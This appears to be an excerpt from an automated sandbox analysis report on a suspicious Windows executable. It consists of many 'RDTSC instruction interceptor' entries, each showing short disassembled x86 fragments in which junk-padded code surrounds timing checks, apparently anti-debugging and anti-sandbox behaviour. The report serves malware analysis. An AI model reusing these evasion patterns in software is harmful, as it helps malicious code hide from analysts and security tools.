                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF544 second address: 9FF548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0330F second address: A03313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03313 second address: A03317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A024F2 second address: A024FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03317 second address: A03388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F74491B01D8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2494h], eax 0x0000002a push 00000000h 0x0000002c adc bl, FFFFFFB1h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F74491B01D8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b mov edi, esi 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F74491B01E1h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A03388 second address: A0338D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0449A second address: A0449E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0552B second address: A05531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05531 second address: A05535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A045C4 second address: A04668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A003h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F7448D3A001h 0x00000010 jmp 00007F7448D39FFBh 0x00000015 nop 0x00000016 sub dword ptr [ebp+12450886h], eax 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F7448D39FF8h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 movzx ebx, di 0x00000047 mov eax, dword ptr [ebp+122D1161h] 0x0000004d mov bx, 56FCh 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push edx 0x00000056 call 00007F7448D39FF8h 0x0000005b pop edx 0x0000005c mov dword ptr [esp+04h], edx 0x00000060 add dword ptr [esp+04h], 00000015h 0x00000068 inc edx 0x00000069 push edx 0x0000006a ret 0x0000006b pop edx 0x0000006c ret 0x0000006d or dword ptr [ebp+122D297Ch], edi 0x00000073 mov edi, dword ptr [ebp+12448C5Bh] 0x00000079 nop 0x0000007a push eax 0x0000007b push edx 0x0000007c jns 00007F7448D39FF8h 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A055CF second address: A055D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A09263 second address: A09267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0578B second address: A0578F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D3FC second address: A0D400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D400 second address: A0D406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C41 second address: A10C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C46 second address: A10C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C5F second address: A10C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F7448D39FF6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C6C second address: A10C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C70 second address: A10C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12FED second address: A12FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12FF3 second address: A12FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12FF7 second address: A1300D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F74491B01D6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC0D5 second address: 9AC0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AC0DE second address: 9AC0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A171FE second address: A1720B instructions: 0x00000000 rdtsc 0x00000002 js 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1720B second address: A17211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17211 second address: A1721C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7448D39FF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1721C second address: A17222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17222 second address: A17226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A17226 second address: A1722C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA6F5 second address: 9AA6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA6F9 second address: 9AA701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA701 second address: 9AA70F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7448D39FF8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA70F second address: 9AA715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A184F2 second address: A1850D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F7448D39FF8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jng 00007F7448D3A004h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1850D second address: A18511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18630 second address: A18662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F7448D3A00Eh 0x0000000f jmp 00007F7448D3A008h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18662 second address: A18667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18667 second address: A18671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A18671 second address: A186A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jp 00007F74491B01EEh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F74491B01DCh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A186A7 second address: A186AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A186AB second address: A186B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D24D1 second address: 9D24E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007F7448D39FF6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D509 second address: A1D524 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F74491B01DFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D524 second address: A1D528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D528 second address: A1D54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F74491B01DDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F74491B01D8h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D54A second address: A1D550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D550 second address: A1D567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D567 second address: A1D56D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D56D second address: A1D571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DC0C second address: A1DC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DC10 second address: A1DC6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F74491B01E3h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007F74491B01E7h 0x00000017 jmp 00007F74491B01E9h 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DC6D second address: A1DC77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DDDC second address: A1DDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E2E6 second address: A1E2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E2EB second address: A1E2F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E2F1 second address: A1E341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F7448D39FFCh 0x0000000e jbe 00007F7448D39FF6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F7448D3A003h 0x0000001e jg 00007F7448D39FF6h 0x00000024 jmp 00007F7448D3A000h 0x00000029 popad 0x0000002a pushad 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d jns 00007F7448D39FF6h 0x00000033 pushad 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E341 second address: A1E346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E5F9 second address: A1E5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E5FD second address: A1E60F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A21C25 second address: A21C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E89AC second address: 9E89B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8E45 second address: 9E8E57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F7448D39FFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E8E57 second address: 9E8E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E92D1 second address: 9E92E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7448D3A001h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E95A9 second address: 9E95BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E99D5 second address: 9E9A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A009h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+122D2CB5h] 0x00000011 pop edx 0x00000012 lea eax, dword ptr [ebp+1247A4A6h] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F7448D39FF8h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov dword ptr [ebp+122DB5E3h], edx 0x00000038 nop 0x00000039 pushad 0x0000003a pushad 0x0000003b jmp 00007F7448D3A007h 0x00000040 jne 00007F7448D39FF6h 0x00000046 popad 0x00000047 pushad 0x00000048 jng 00007F7448D39FF6h 0x0000004e push esi 0x0000004f pop esi 0x00000050 popad 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F7448D39FFFh 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E9A67 second address: 9D30EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b jmp 00007F74491B01E6h 0x00000010 movsx edi, dx 0x00000013 popad 0x00000014 call dword ptr [ebp+1244CBF6h] 0x0000001a je 00007F74491B01FFh 0x00000020 push eax 0x00000021 jo 00007F74491B01D6h 0x00000027 pop eax 0x00000028 jng 00007F74491B01F1h 0x0000002e pushad 0x0000002f popad 0x00000030 jmp 00007F74491B01E9h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F74491B01E5h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D30EF second address: 9D30F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D30F3 second address: 9D30F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A21F66 second address: A21F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A21F6A second address: A21F8A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F74491B01E7h 0x00000008 pop edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2265B second address: A22661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A227CC second address: A227FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F74491B01E7h 0x0000000b push ebx 0x0000000c jmp 00007F74491B01DBh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007F74491B01D6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A227FF second address: A22803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A26162 second address: A2618C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F74491B01DDh 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jmp 00007F74491B01E1h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B444 second address: A2B449 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B592 second address: A2B59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B834 second address: A2B83E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7448D39FF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B83E second address: A2B856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F74491B01DEh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B9E8 second address: A2BA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7448D3A006h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA02 second address: A2BA06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AFE0 second address: A2AFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AFE7 second address: A2B03E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F74491B01D6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jmp 00007F74491B01E8h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jp 00007F74491B01DEh 0x0000001a jng 00007F74491B01DCh 0x00000020 jmp 00007F74491B01E3h 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FE07 second address: A2FE0D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3578A second address: A357B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F74491B01F1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0641 second address: 9A0667 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F7448D3A004h 0x0000000e push edx 0x0000000f pop edx 0x00000010 je 00007F7448D39FF6h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0667 second address: 9A0680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E4h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34665 second address: A34669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34669 second address: A34675 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F74491B01D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34F65 second address: A34F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38A6A second address: A38A94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F74491B01E3h 0x00000009 pop edx 0x0000000a jg 00007F74491B01D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F74491B01D6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
